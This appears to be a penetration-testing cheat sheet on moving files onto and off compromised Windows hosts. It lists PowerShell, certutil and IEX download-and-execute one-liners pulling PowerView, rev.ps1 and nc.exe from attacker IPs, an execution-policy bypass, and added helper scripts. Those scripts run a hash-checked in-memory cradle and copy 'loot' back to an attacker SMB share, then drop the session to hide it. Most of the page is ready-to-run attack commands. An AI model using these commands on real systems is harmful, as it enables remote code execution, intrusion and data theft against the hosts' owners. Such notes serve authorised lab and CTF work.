# Windows

## IWR (Invoke-WebRequest)

```
powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe
```

## System.Net.WebClient

```
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')
```

## Certutil

```
certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe
```

## IEX

Instead of writing the payload to disk, it can be executed in memory with Invoke-Expression, or its alias **iex**.

```
powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')
```

IEX also accepts pipeline input.

```
powershell Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex
```

### Internet Explorer Basic Parsing

In Windows PowerShell 5.1, `Invoke-WebRequest` parses the response with the Internet Explorer engine. On a host where the Internet Explorer first-launch configuration has never been completed, the request itself succeeds but the cmdlet fails while parsing the response, so nothing reaches the pipeline.

![](https://851323342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FolGZmSV9EYkU0MXXM4LC%2Fuploads%2FG0SInQCUwcDTwi2QKSKH%2Fimage.png?alt=media\&token=239c7e06-5091-4c6a-a3e4-376e23282f0d)

This can be bypassed with the `-UseBasicParsing` switch, which skips the IE engine entirely (PowerShell 6 and later always use basic parsing, so the switch is harmless there).

```
powershell Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex
```
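The following is an added example (not code from the original page) that combines the in-memory cradle with an integrity check a practitioner will want before executing anything fetched over the wire: it downloads the script as raw bytes with `Net.WebClient` (which does not depend on the IE parsing engine, so the first-launch problem above does not apply), compares the SHA-256 with a value computed on the attacker side, and only then passes the text to `Invoke-Expression`. The URL, port and hash value are placeholders.

```powershell
# Added example, not from the original page: fetch a script, verify its SHA-256,
# then run it in memory without touching disk. URL and hash are placeholders.
function Invoke-VerifiedCradle {
    param(
        [Parameter(Mandatory = $true)][string]$Url,
        # Expected hash, e.g. from `sha256sum rev.ps1` on the attacker host.
        [Parameter(Mandatory = $true)][string]$Sha256
    )

    # Older hosts default to TLS 1.0; force TLS 1.2 so an HTTPS listener works.
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

    # WebClient does not need the IE engine, unlike Invoke-WebRequest on PS 5.1.
    $wc    = New-Object Net.WebClient
    $bytes = $wc.DownloadData($Url)   # raw bytes, so the hash matches the file on disk

    $sha  = [Security.Cryptography.SHA256]::Create()
    $hash = ([BitConverter]::ToString($sha.ComputeHash($bytes))) -replace '-', ''

    if ($hash -ne $Sha256.ToUpper()) {
        throw "Hash mismatch for $Url : got $hash, expected $Sha256"
    }

    # Decode, strip a UTF-8 BOM if the file carries one, and execute in memory.
    $code = [Text.Encoding]::UTF8.GetString($bytes).TrimStart([char]0xFEFF)
    Invoke-Expression $code
}

# Usage (placeholder values; a wrong hash makes the call throw instead of executing):
Invoke-VerifiedCradle -Url 'http://10.10.16.26:8000/rev.ps1' `
    -Sha256 '<sha256sum output from the attacker host>'
```

The hash is taken over the bytes on the wire rather than over the decoded string, so it matches `sha256sum` on the serving side regardless of the encoding PowerShell would otherwise pick.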

### Escaping shell

If one of the commands above fails on the quoted URL with an error such as\
**Incorrect syntax near '/'.**\
the quotes are being consumed by the calling shell before they reach PowerShell. Escape the inner double quotes with a backslash (`\"`):

```
powershell.exe IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.16.26:8000/rev.ps1\")
```

## Script

* If the one-liners above are **blocked**, write a small **PowerShell script** that downloads the file instead.
* Run the following from a cmd.exe prompt on the victim; each `echo` appends one line to `wget.ps1` (cmd does not expand `$pwd`, `$url` and so on, so they are written literally; from a PowerShell prompt they would be evaluated instead):

```
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://ATTACKER_IP/nc.exe" >> wget.ps1
echo $file = "nc.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
```

Execution of script

```
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```

## SMB

**Attacker**

```
smbserver.py -smb2support root /tmp
# -smb2support: SMB1 is disabled by default on current Windows, so the client needs SMB2
```

**Target**

```
dir \\Attacker_ip\root
# will list out all files

copy \\Attacker_ip\root\winPEASx86.exe .
# To download from our machine

copy user.txt \\Attacker_ip\root
# To upload file to our box
```
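The same transfer from PowerShell, as an added example that is not part of the original page. It goes beyond the `copy` one-liners in two ways a practitioner usually needs: it authenticates to the share, because recent Windows builds disable insecure guest logons by default and may refuse an unauthenticated share, and it verifies the downloaded file and drops the SMB session afterwards so the mapping does not linger in `net use` output. It assumes the impacket server was started with credentials, for example `smbserver.py -smb2support -username s -password p root /tmp`; the address 10.10.14.5 and the credentials `s`/`p` are placeholders.

```powershell
# Added example, not from the original page: authenticated SMB download/upload
# from PowerShell with verification and cleanup. Server, share and credentials
# are placeholders matching an impacket smbserver started with -username/-password.
param(
    [string]$Server   = '10.10.14.5',
    [string]$Share    = 'root',
    [string]$User     = 's',
    [string]$Password = 'p',
    [string]$File     = 'winPEASx86.exe',
    [string]$Dest     = $env:TEMP
)

$unc = "\\$Server\$Share"

# Authenticate to the share without assigning a drive letter.
net use $unc /user:$User $Password /persistent:no | Out-Null
if ($LASTEXITCODE -ne 0) {
    throw "net use to $unc failed (server down, wrong credentials, or SMB2 not enabled on the server?)"
}

try {
    # Download: attacker -> target.
    Copy-Item -Path (Join-Path $unc $File) -Destination $Dest -Force

    # Compare this value with `sha256sum /tmp/winPEASx86.exe` on the attacker host.
    (Get-FileHash -Algorithm SHA256 -Path (Join-Path $Dest $File)).Hash

    # Upload: target -> attacker (lands in /tmp on the attacker host).
    $loot = Join-Path $env:USERPROFILE 'Desktop\user.txt'
    if (Test-Path $loot) {
        Copy-Item -Path $loot -Destination $unc -Force
    }
}
finally {
    # Drop the session so the connection does not remain visible in `net use`.
    net use $unc /delete /y | Out-Null
}
```

If the target still cannot connect after this, check that the server side was started with `-smb2support`; a client with SMB1 disabled will not negotiate a session with an SMB1-only server.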
